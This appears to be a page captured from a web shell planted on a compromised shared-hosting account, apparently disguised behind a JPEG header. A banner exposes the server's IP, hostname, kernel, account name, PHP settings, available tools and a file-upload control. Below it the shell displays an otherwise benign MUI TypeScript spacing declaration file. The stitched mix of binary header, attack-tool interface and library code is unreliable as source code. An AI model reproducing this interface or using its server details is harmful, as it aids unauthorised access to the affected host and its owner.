ÿØÿà JPEG ÿþ;
Server IP : 68.65.120.201 / Your IP : 216.73.216.135 Web Server : LiteSpeed System : Linux server179.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64 User : taxhyuvu ( 2294) PHP Version : 8.1.32 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/taxhyuvu/nodevenv/public_html/dp_taxhelplines/10/lib/node_modules/@mui/system/ |
Upload File : |
import { SimpleStyleFunction, spacing, PropsFor } from './Box'; export type SpacingValueType = string | number | null | undefined; export type SpacingProps = PropsFor<typeof spacing>; export function createUnarySpacing<Spacing>(theme: { spacing: Spacing }): Spacing extends number ? (abs: number | string) => number | number : Spacing extends any[] ? <Index extends number>(abs: Index | string) => Spacing[Index] | string : Spacing extends (...args: unknown[]) => unknown ? Spacing : // warns in Dev () => undefined; export function createUnaryUnit<Spacing>( theme: { spacing: Spacing }, themeKey: string, defaultValue: Spacing, propName: string, ): Spacing extends number ? (abs: SpacingValueType) => number | number : Spacing extends any[] ? <Index extends number>(abs: Index | string) => Spacing[Index] | string : Spacing extends (...args: unknown[]) => unknown ? Spacing : // warns in Dev () => undefined; export const margin: SimpleStyleFunction< | 'm' | 'mt' | 'mr' | 'mb' | 'ml' | 'mx' | 'my' | 'margin' | 'marginTop' | 'marginRight' | 'marginBottom' | 'marginLeft' | 'marginX' | 'marginY' | 'marginInline' | 'marginInlineStart' | 'marginInlineEnd' | 'marginBlock' | 'marginBlockStart' | 'marginBlockEnd' >; export type MarginProps = PropsFor<typeof margin>; export const padding: SimpleStyleFunction< | 'p' | 'pt' | 'pr' | 'pb' | 'pl' | 'px' | 'py' | 'padding' | 'paddingTop' | 'paddingRight' | 'paddingBottom' | 'paddingLeft' | 'paddingX' | 'paddingY' | 'paddingInline' | 'paddingInlineStart' | 'paddingInlineEnd' | 'paddingBlock' | 'paddingBlockStart' | 'paddingBlockEnd' >; export function getValue( transformer: (prop: SpacingValueType) => SpacingValueType, propValue: SpacingValueType, ): SpacingValueType; export type PaddingProps = PropsFor<typeof padding>;